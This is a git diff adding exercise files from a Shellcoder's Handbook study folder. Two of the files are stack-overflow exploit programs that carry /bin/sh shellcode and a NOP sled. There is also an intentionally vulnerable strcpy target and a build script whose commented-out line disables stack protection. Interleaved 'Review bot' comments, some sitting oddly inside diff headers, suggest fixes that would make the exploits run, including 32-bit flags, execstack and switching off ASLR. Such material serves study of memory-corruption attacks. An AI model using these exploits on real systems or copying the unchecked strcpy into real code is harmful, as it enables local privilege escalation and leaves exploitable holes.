diff --git a/shellcoders_handbook/funcs_and_stacks/exploit.c b/shellcoders_handbook/funcs_and_stacks/exploit.c
new file mode 100644
index 0000000..1490c99
--- /dev/null
+++ b/shellcoders_handbook/funcs_and_stacks/exploit.c
@@ -0,0 +1,49 @@
+#include
+#include
+#include
+
+#define offset_size 0
+#define buffer_size 512
+
+//char sc[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80";
+
+char sc[] =
+ "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46"
+ "\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1"
+ "\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
+
+unsigned long find_start(void){
+ __asm__("movl %esp,%eax");
+}
+
+int main(int argc, char *argv[]){
+
+ char *buff, *ptr;
+ long *addr_ptr, addr;
+ int offset=offset_size, bsize=buffer_size;
+
+ if (argc > 1) bsize = atoi(argv[1]);
+ if (argc > 2) offset = atoi(argv[2]);
+
+ addr = find_start() - offset;
+ printf("Attempting address: 0x%x\n", addr);
+ printf("ADDR %x", addr);
+ ptr = buff;
+ addr_ptr = (long *)ptr;
+
+ for (int i=0; i < bsize; i += 4){
+ //printf("ADDR %s", addr);
+ *(addr_ptr++) = addr;
+ }
+ ptr += 4;
+
+ for (int i=0; i < strlen(sc); i++)
+ *(ptr++) = sc[i];
+
+ buff[bsize - 1] = '\0';
+ memcpy(buff, "BUF=", 4);
+ putenv(buff);
+ system("/bin/bash");
+
+ return 0;
+}
diff --git a/shellcoders_handbook/funcs_and_stacks/exploit_nops.c b/shellcoders_handbook/funcs_and_stacks/exploit_nops.c
new file mode 100644
index 0000000..49aa347
--- /dev/null
+++ b/shellcoders_handbook/funcs_and_stacks/exploit_nops.c
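Review bot: `buff` is declared but never allocated in main, so `ptr = buff; addr_ptr = (long *)ptr;` and the fill loops write through an uninitialised pointer — undefined behaviour that in practice segfaults before the environment variable is ever set. The sibling exploit_nops.c allocates with `malloc(bsize)` and checks the result; this file should do the same, and because `bsize` comes straight from `atoi(argv[1])` it should also be bounded so that the `i += 4` fill loop, the shellcode copy at `ptr += 4` and `buff[bsize - 1]` all stay inside the buffer: `if (bsize < (int)strlen(sc) + 8 || (bsize % 4) != 0 || !(buff = malloc(bsize))) { fprintf(stderr, "bad size or malloc failed\n"); return 1; }`. Minor: `addr` is a `long` printed with `%x` (should be `%lx`), and the three `#include` lines show no header name in this view — if that is not a display artifact the file will not build. A one-line comment above `putenv(buff)` saying the payload is handed to a separately run victim through the `BUF` environment variable would make the flow obvious to a reader.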
@@ -0,0 +1,52 @@
+#include
+#include
+#include
+
+#define DEFAULT_OFFSET 0
+#define DEFAULT_BUFFER_SIZE 512
+#define NOP 0x90
+
+char shellcode[]="\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80";
+
+/*char shellcode[] =
+"\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46"
+"\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1"
+"\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
+*/
+
+unsigned long get_sp(void) {
+ __asm__("movl %esp,%eax");
+}
+void main(int argc, char *argv[]){
+ char *buff, *ptr;
+ long *addr_ptr, addr;
+ int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
+ int i;
+
+ if (argc > 1) bsize = atoi(argv[1]);
+ if (argc > 2) offset = atoi(argv[2]);
+ if (!(buff = malloc(bsize))) {
+ printf("Can’t allocate memory.\n");
+ exit(0);
+ }
+
+ addr = get_sp() - offset;
+ printf("Using address: 0x%x\n", addr);
+ ptr = buff;
+ addr_ptr = (long *) ptr;
+
+ for (i = 0; i < bsize; i+=4)
+ *(addr_ptr++) = addr;
+
+ for (i = 0; i < bsize/2; i++)
+ buff[i] = NOP;
+ ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
+
+ for (i = 0; i < strlen(shellcode); i++)
+ *(ptr++) = shellcode[i];
+
+ buff[bsize - 1] = '\0';
+ memcpy(buff,"BUF=",4);
+ putenv(buff);
+ system("/bin/bash");
+ }
diff --git a/shellcoders_handbook/funcs_and_stacks/function.c b/shellcoders_handbook/funcs_and_stacks/function.c
new file mode 100644
index 0000000..089e562
--- /dev/null
+++ b/shellcoders_handbook/funcs_and_stacks/function.c
@@ -0,0 +1,10 @@
+#include
+
+function(int a, int b){
+ int array[5];
+}
+
+main(){
+ function(1, 2);
+ printf("This is where the return address points");
+}
diff --git a/shellcoders_handbook/funcs_and_stacks/run.sh b/shellcoders_handbook/funcs_and_stacks/run.sh
new file mode 100755
index 0000000..9cfb2dc
--- /dev/null
+++ b/shellcoders_handbook/funcs_and_stacks/run.sh
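Review bot: `bsize` from `atoi(argv[1])` is never validated, so a small or negative value turns `malloc(bsize)` into a huge request and, because `strlen` is `size_t`, makes `ptr = buff + ((bsize/2) - (strlen(shellcode)/2))` wrap to a pointer far outside the buffer that the shellcode loop then writes through; add `if (bsize < (int)strlen(shellcode) + 8 || (bsize % 4) != 0) { fprintf(stderr, "buffer too small\n"); return 1; }` right after the argument parsing. The allocation-failure path calls `exit(0)`, which reports success to the calling shell; it should be `exit(1)`. `void main` is not a valid signature in hosted C — use `int main(int argc, char *argv[])` with `return 0;` at the end, as exploit.c already does. Minor: `addr` is a `long` printed with `%x` (`%lx`), and the `#include` lines carry no header name in this view.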
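Review bot: Both definitions rely on implicit `int` — `function(int a, int b)` and `main()` have no return type — which C99 removed and which recent GCC (14 and later, to my knowledge) rejects by default, so the file may not build with the `cc` line in run.sh; write `void function(int a, int b)` and `int main(void)`, and end the `printf` string with `\n` so the output lands on its own line. The `#include` line shows no header name in this view; `printf` needs `<stdio.h>`. A short comment above `function` saying that `array[5]` exists only to give the frame a visible local so the saved return address can be located in gdb would explain why the function body is otherwise empty.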
@@ -0,0 +1,9 @@
+#!/usr/bin/env bash
+
+file=$1
+# -gddb; compile gdb output used for debugging
+# -mpreferred-stack-boundary ; will setup our stack into dword size increments.
+# Otherwise gcc will optimize the stack and make things more difficult then they need to be at this point.
+cc -mpreferred-stack-boundary=2 -ggdb "$file".c -o "$file"
+
+#gcc -fno-stack-protector -z execstack "$file".c -o "$file"
diff --git a/shellcoders_handbook/funcs_and_stacks/victim.c b/shellcoders_handbook/funcs_and_stacks/victim.c
new file mode 100644
index 0000000..d87bf74
--- /dev/null
+++ b/shellcoders_handbook/funcs_and_stacks/victim.c
@@ -0,0 +1,9 @@
+#include
+#include
+
+int main(int argc, char *argv[]){
+ char little_array[512];
+ if (argc > 1)
+ strcpy(little_array, argv[1]);
+ return 0;
+}
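Review bot: The active `cc` line builds without `-m32`, `-fno-stack-protector` or `-z execstack`, yet the companion exploit sources use 32-bit shellcode (`int 0x80`, `movl %esp,%eax`) and expect to execute code on the stack; in 64-bit mode gcc also rejects `-mpreferred-stack-boundary=2` in my experience, so this script is unlikely to produce a usable target as written. The commented-out line already has the missing flags; merge them into one: `cc -m32 -fno-stack-protector -z execstack -mpreferred-stack-boundary=2 -ggdb "$file".c -o "$file"`. `file=$1` is used unchecked, so a missing argument runs `cc .c`; add `[ -n "$file" ] || { echo "usage: $0 <name>" >&2; exit 1; }` before the compile. The comment says `-gddb` where the flag is `-ggdb`, and it would be worth stating that the stack-address guess in the exploits presupposes ASLR is disabled on the host.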
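Review bot: This file is the deliberately overflowable target — `strcpy(little_array, argv[1])` copies an attacker-controlled argument into a fixed 512-byte stack buffer with no length check — and it carries no comment saying so, which is exactly the kind of listing that later gets copied into real code. Add a header such as `/* Training target: intentionally vulnerable. Unbounded strcpy into a 512-byte stack buffer; build only via run.sh, never reuse. */`. Note too that `little_array` is never read after the copy, so an optimising build might drop the store; the `-ggdb` build without `-O` in run.sh avoids that, and the comment should say so. The two `#include` lines show no header name in this view; `strcpy` needs `<string.h>`.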